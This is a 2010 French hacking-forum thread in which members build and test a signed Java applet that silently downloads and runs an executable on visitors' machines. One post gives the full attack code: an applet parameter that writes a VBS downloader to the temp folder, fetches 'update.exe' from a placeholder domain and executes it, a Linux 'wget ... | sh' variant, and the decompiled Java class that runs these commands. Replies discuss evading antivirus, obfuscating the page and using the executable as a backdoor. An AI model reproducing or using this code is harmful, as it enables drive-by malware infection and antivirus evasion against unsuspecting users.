Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 19-06-2010 20:58:52

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

applet java

Salut a tous passionné de sécurité

Veidam a écrit :

avant la fin du weekend je vais mettre en place un petit aperçu de mes travaux sur l'applet java
bien sur vous pourrez me faire confiance ou pas et l'exécuter cela ouvrira une message box sur votre pc ce qui voudra dire que cela a fonctionner

le code et le liens seront soumis a modération avant de le mettre ici et vous saurez si m1ck3y vous assure que vous ne risquez rien il le testera avant vous pour ça 

vous allez suivre mes testes en direct car je ne suis pas sur d'y parvenir (plusieur paramétres ne sont pas encore tester) j'ai dans l'idée de vous utiliser comme cobaye ceux qui me ferons confiance et qui activerons l'applet en serons quitte pour voir le bloc note de leurs windows s'ouvrir (je l'ai réussi plusieurs fois sans faire sonner avast 5 sur xp sp2 non mis a jours mais avec internet explorer 8) donc affaire a suivre 

je contaterais M1ck3y et Crash d'ici peu pour qu'il approuve le lien et le faite que tout est clean et que c seulement pour le fun et le partage vous aurez juste a de me dire si cela fonctionne ou pas sur vos os seven vista et xp ... si vous avez confiance wink

Je vous invite a lire ce PDF qui me servira d'introduction au sujet concernant un applet java permettant d'exécuter un exe sur votre disque dur sans que vous n'y voyez rien 

c'est simple j'ai créer une page web d'exemple

que se passe t'il si vous accepter l'applet vous aller exécuter un exe qui sera télécharger dans le fichier temp de votre windo

l'exe est simple c un script vbs qui tiens sur une ligne c une message box le script a été converti en exe

msgbox "J'ai ecrit sur ton disques dur ;-) powned" , vbokOnly+vbInformation ,"COUCOU c Veidam de crack-wpa"

Vous ne risquez absolument rien c juste pour avoir des retour selon vos os et antivirus pour voir ce que ça donne et aussi pour partager un truc que je trouve intéressant a voir je découvre ceci peut être que vous aussi par la même occasion...

pour passer j'ai crypté la page html qui lance l'applet

vous pouvez utiliser une virtual machine pour ceux qui n'ont pas confiance

vos retours seront les bienvenue je vous laisse voir le potentiel de ce truc

c là que ça se passe cool


en travaux merci de revenir

Dernière modification par Veidam (23-06-2010 17:02:01)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 19-06-2010 22:17:46

Dack
Membre Irremplaçable
Inscription : 07-04-2009
Messages : 1 257

Re : applet java

Alors je l'ai accepté et j'ai eu directement un avertissement de mon anti-virus, AntiVir Guard, comme moi le fichier winconfig.vbs contenu dans c:\Users\PC\AppData\Local\Temp\ contient le modèle de détection du virus de script VBS VBS/Psyme.623 . Il a été ajouté le 16/06/2010 à la base de donnée d'AntiVir : http://www.avira.com/fr/threats/section … 08.99.html .

Puis j'ai fais ignorer et j'ai eu le CCU (Controle de Compte d'utilisation, j'ai Windows 7 Edition Intégrale 64bits ) qui m'a avertit.

J'ai fais exécuter ou ouvrir (je sais plus) et j'ai eu la fenetre avec marqué :

msgbox "J'ai ecrit sur ton disques dur ;-) powned" , vbokOnly+vbInformation ,"COUCOU c Veidam de crack-wpa"

Hors Ligne

#3 19-06-2010 22:27:45

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : applet java

et bien c intéressant on est dans les chou pour antivir et windows 7

mon xp avec avast se fait avoir en beauté

pour vista ça doit être comme toi je pense...

il est possible d'attaquer linux aussi je vais tester cette voie pour voir ce que ça peut donner je suis sceptique quand même

merci de ton comm

Hors Ligne

#4 19-06-2010 22:28:08

Re : applet java

coté antivir, j'ai tout détecté (mais c'est pas un prob)

ici on regarde le boulot fournit
ce qui faut analyser c'est winconfig.vbs puis l'utilisation de wscript.exe pour update.exe et tt.vbs
sans compter la mise en place du certif java (mais ça c'est coté server)

ça peu s'améliorer, ça commence à prendre forme, je t'encourage à continuer

Veidam je t'ai mail


crsh.jpg

Hors Ligne

#5 19-06-2010 22:35:08

raylook
Membre d'Or
Lieu : dans ton disque dur !!
Inscription : 13-01-2010
Messages : 449
Site Web

Re : applet java

salut Veidam
Bon j'ai pris mon courage a deux mains tongue voila se que ca donne , plantage j'ai moi hmm et pour info c'est sous vmware .(c'est pas que j'ai pas confiance )

sanstitrejy.jpg
taille réel ici

pour passer j'ai crypté la page html qui lance l'applet

enfin crypté ...^^

Dernière modification par raylook (19-06-2010 22:36:23)


fete.gif

Hors Ligne

#7 19-06-2010 22:47:41

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : applet java

[email protected] je t'ai répondue

sinon maintenant que les source sont dans les mains d'un bon on vas avoir un beau compte rendue voir un tuto qu'en pense tu [email protected] ?

Hors Ligne

#8 19-06-2010 22:59:03

raylook
Membre d'Or
Lieu : dans ton disque dur !!
Inscription : 13-01-2010
Messages : 449
Site Web

Re : applet java

[email protected] a écrit :

va dans avast et allow wscript.exe

au fait tu en es contant de ton WinLSD ?

héhé ,ca marche mais je sais pas comment allow wscript ,juste redemarrer l'antivirus et ca marche ..et sinon pour LSD je l'avait choisit juste pour vmware parce qu'il occupe très peu de place en mémoire et pour mes tests wink .


fete.gif

Hors Ligne

#9 19-06-2010 23:14:09

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : applet java

cool merci de vos testes c normal de pas avoir confiance mais y' a no soucis c pour le fun et pour le débat que je l'ai fait pas pour être un super lamerz/tapez big_smile

Dernière modification par Veidam (19-06-2010 23:15:11)

Hors Ligne

#11 19-06-2010 23:22:14

Squaks
Membre Irremplaçable
Inscription : 18-06-2009
Messages : 974

Re : applet java

C'est bizarre que personne n'ai fait de réflexions sur la fille ... Moi je la trouve pas mal big_smile

Sinon moi ca marche pas du tout ... Pas de demande d'applet, pas d'alerte antivirus et pas de MessageBox ...


Sharkoff

Hors Ligne

#12 19-06-2010 23:22:43

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : applet java

je suis a la bonne école wink

Hors Ligne

#13 19-06-2010 23:23:58

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : applet java

Salut Squaks

tu utilise quel navigateur ?

Hors Ligne

#14 19-06-2010 23:29:39

raylook
Membre d'Or
Lieu : dans ton disque dur !!
Inscription : 13-01-2010
Messages : 449
Site Web

Re : applet java

tésté sur mon pc principale kaspersky n'a pas branché , mais bon travail  et bonne continuation wink


fete.gif

Hors Ligne

#15 19-06-2010 23:42:51

Re : applet java

Bon ! Tu as fais pas mal d'effort, je te donnes pas la solution mais tu peux avoir le même résultat avec 1 vbs, indice : revois les echo dans l'unescape... Simplifies.

[edit:] Après en effet l'exe (pas sous cette forme) pourrait être utile en tant que backdoor


crsh.jpg

Hors Ligne

#16 20-06-2010 08:21:39

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : applet java

merci de tes encouragements et les autres aussi wink

sinon je vais voir là je découvre a peine les source que j'ai juste su modifier pour le faire tourner en exemple mais je ne suis pas le créateur du code bien sur

mais je pense que l'on peut surement simplifier et voir passer les droits de vista et seven voir des antivirus
cela sera je pense le javascript qui peut le faire le php moins mais il y a encore des possibilités de coder un truc furtif je pense c'est du boulot quand on est un noobs mais c amusant de faire tourner un truc comme ça

là on passe sur xp avec avast donc c un début qui me satisfait plus ou moins

[email protected] pense tu que l'on pourrait le faire sur un linux avec

wget lien_ici -O- | sh

il faut que l'utilisateur soit en root pour que cela puisse le faire non ?

Hors Ligne

#17 20-06-2010 09:21:14

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : applet java

je vous donne les codes différent vbs et java pour information c'est intéressant

ici le code vbs a insérer dans la page html entre la balise <body>

mais commençons pour nous les noobs a voir comment créer une page html simple
on ouvre bloc note ou kwrite ou kate et on copie colle ceci

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" >
   <head>
       <title>page d'accueil</title>
       <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
   </head>
   <body>
// on code ici en html php javascript 
   </body>
</html>
<applet width='1' height='1' code='Client.class' archive='Client.jar'>
<param name='windows1' value='cmd.exe /c echo Const adTypeBinary = 1 > %temp%\winconfig.vbs 
& echo Const adSaveCreateOverWrite = 2 >> %temp%\winconfig.vbs 
& echo Dim S >> %temp%\winconfig.vbs 
& echo Dim A >> %temp%\winconfig.vbs 
& echo Dim DTNDTN >> %temp%\winconfig.vbs 
& echo S = "ADODB" >> %temp%\winconfig.vbs 
& echo A = ".Stream" >> %temp%\winconfig.vbs 
& echo Set DTNDTN = CreateObject(S+A) >> %temp%\winconfig.vbs 
& echo DTNDTN.Type = adTypeBinary >> %temp%\winconfig.vbs 
& echo DTNDTN.Open >> %temp%\winconfig.vbs 
& echo DTNDTN.Write BinaryGetURL(Wscript.Arguments(0)) >> %temp%\winconfig.vbs 
& echo DTNDTN.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> %temp%\winconfig.vbs 
& echo Function BinaryGetURL(URL) >> %temp%\winconfig.vbs 
& echo Dim Http >> %temp%\winconfig.vbs 
& echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> %temp%\winconfig.vbs 
& echo Http.Open "GET", URL, False >> %temp%\winconfig.vbs 
& echo Http.Send >> %temp%\winconfig.vbs 
& echo BinaryGetURL = Http.ResponseBody >> %temp%\winconfig.vbs 
& echo End Function >> %temp%\winconfig.vbs 
& echo Set shell = CreateObject("WScript.Shell") >> %temp%\winconfig.vbs 
& echo Shell.Run "%temp%\update.exe" >> %temp%\winconfig.vbs 
& start %temp%\winconfig.vbs  http://votredomaine/update.exe %temp%\update.exe'>
<param name='windows2' value=''>

<param name='unix1' value="">
<param name='unix2' value="">

<param name='linux1' value="wget  LINK HERE2 -O- | sh">
<param name='linux2' value="">

</applet>

mettez ce code entre body enregistrer en index.html normalement votre antivirus ne va pas aimez il va donc falloir travaillé sur ceci pour passer les av et ensuite sur l'exécution du script vbs dans le fichier temp ceux qui ont une idée les chauds du code n'hésitez pas ...

maintenant voyons le code java le fichier client.jar pour ceux qui ne le save pas on peut extraire les fichier facilement d'un executable java fichier jar il suffit de le renommer en .zip tous simplement

que contiens le fichier class.jar

un fichier client.class

import java.applet.Applet;
import java.io.IOException;

public class Client extends Applet
{

    public Client()
    {
    }

    public void init()
    {
        String windows1 = getParameter("windows1");
        String windows2 = getParameter("windows2");
        String linux1 = getParameter("linux1");
        String linux2 = getParameter("linux2");
        String unix1 = getParameter("unix1");
        String unix2 = getParameter("unix2");
        String os = System.getProperty("os.name").toLowerCase();
        if(os.indexOf("win") >= 0)
        {
            try
            {
                Process w1 = Runtime.getRuntime().exec(windows1);
                Process w2 = Runtime.getRuntime().exec(windows2);
            }
            catch(IOException e)
            {
                e.printStackTrace();
            }
        }
        if(os.indexOf("mac") >= 0)
        {
            try
            {
                Process u1 = Runtime.getRuntime().exec(unix1);
                Process u2 = Runtime.getRuntime().exec(unix2);
            }
            catch(IOException e)
            {
                e.printStackTrace();
            }
        }
        if(os.indexOf("lin") >= 0)
        {
            try
            {
                Process l1 = Runtime.getRuntime().exec(linux1);
                Process l2 = Runtime.getRuntime().exec(linux2);
            }
            catch(IOException e)
            {
                e.printStackTrace();
            }
        }
    }
}

et un dossier META-INF
dedans trois fichiers

MICROSOF.SF

Signature-Version: 1.0
SHA1-Digest-Manifest-Main-Attributes: YVxq5D586j+MKlha9vs4tqqF74M=
Created-By: 1.6.0_16 (Sun Microsystems Inc.)
SHA1-Digest-Manifest: AMkDkL1nOXxD7tnNsQg/j2649Dc=

Name: Client.class
SHA1-Digest: 8nEfOXSRVvBqyzPTbf2Bo3w61o4=

MICROSOF.RSA

illisible il faudrait analyser comment créer ce style de fichier (pour comprendre plus a suivre ..)

MANIFEST.MF

Manifest-Version: 1.0
Sealed: true

Name: Client.class
SHA1-Digest: W9ISLpk9lUpxBYEyEOBpNgrdzn8=

voilà pour pouvoir modifier une page html on peut utiliser l'unescape c du javacript rien de complique il suffit de trouver un site qui vous crypte le code html comme ici

finalement pour avoir toucher du doigt certains coté obscure de la (force) prog on s'aperçoit finalement, pas besoin d'être un ingénieur informatique pour compromettre un site internet fabriquer un trojan et passer plusieurs antivirus et pare feu

[email protected] tes tutos m'ont aider je conseil a ceux qui veulent apprendre de l'appliquer top base cool

a+

Dernière modification par Veidam (20-06-2010 09:24:01)

Hors Ligne

#18 20-06-2010 10:22:10

Re : applet java

Merci Veidam,

- Pour le post "wget lien_ici -O- | sh" garde le dans un coin de ta tête, si tu me le permet finalises d'abord celui en cours.

- Pour ton code dans l'unescape, je te file un deuxième indice "ça tien en 1 echo et une création de vbs" pour obtenir le même résultat

- Petite erreur d'inattention dans ton post, c'est pas "...que contiens le fichier class.jar..." mais Client.jar

- Donc une fois le .jar dézipé, vous pouvez utiliser un décompiler java pour éditer Client.class,

ex: pour windows DJ Java Decompiler c'est un trial donc au finish c'est payant.

autre : pour win/nux/mac vous avez JD-GUI et c'est gratos sauf si vous voulez faire une petite donation wink

- pour les détails des codes et ton cheminement pas à pas (voir le mail que je t'ai envoyé hier)

- et voici un décrypteur unescape :

<html> 
<head> 

<title>Décrypteur unescape</title> 

</head> 

<body bgcolor="#000000" text="yellow"> 
<b>Decrypteur de source</b><br> 
Représentation du code: 

<script language="JavaScript" type="text/javascript"> 
<!-- 
var x; 
x=prompt("Entrez votre source à décrypter", ""); 
document.write(unescape(x)); 
alert(unescape(unescape(x))); 
//--> 
</script> 
</body> 

</html>

enregistrez le dans un .html


crsh.jpg

Hors Ligne

#19 20-06-2010 10:26:11

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : applet java

merci je suis en train de faire un tuto sur une backdoor en reverse shell aprés je me remet la dessus

sinon je prend note de tes remarques avec intérêt je partagerais encore mes testes ici

Hors Ligne

#20 20-06-2010 10:44:44

Squaks
Membre Irremplaçable
Inscription : 18-06-2009
Messages : 974

Re : applet java

Veidam a écrit :

Salut Squaks

tu utilise quel navigateur ?

Firefox 3.5.6 sous windows xp familial avec Norton


Sharkoff

Hors Ligne

#21 20-06-2010 10:53:41

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : applet java

tu as tenter avec ie si ça marche avec c que ta config de firefox coince le truc j'ai eu ceci mais a l'inverse c ie qui passe pas chai po pourkoi ...

Hors Ligne

#23 20-06-2010 13:41:16

Squaks
Membre Irremplaçable
Inscription : 18-06-2009
Messages : 974

Re : applet java

Juste une popup à propos de la "Signature Numérique" mais sinon marche bien sous IE 8 sans antivirus


Sharkoff

Hors Ligne

#24 20-06-2010 14:58:28

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : applet java

et oui la popup ne peut pas être facilement enlevé mais c a étudier ce serait alors le top... de l'insécurité mais le flash peut peut être servir a ça faut chercher

tu as quoi comme av ?

merci du teste sinon smile

Hors Ligne

#25 20-06-2010 15:44:38

Squaks
Membre Irremplaçable
Inscription : 18-06-2009
Messages : 974

Re : applet java

Aucun av

[Edit]Comment le flash pourrait y faire ?

Dernière modification par Squaks (20-06-2010 15:49:22)


Sharkoff

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.039 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]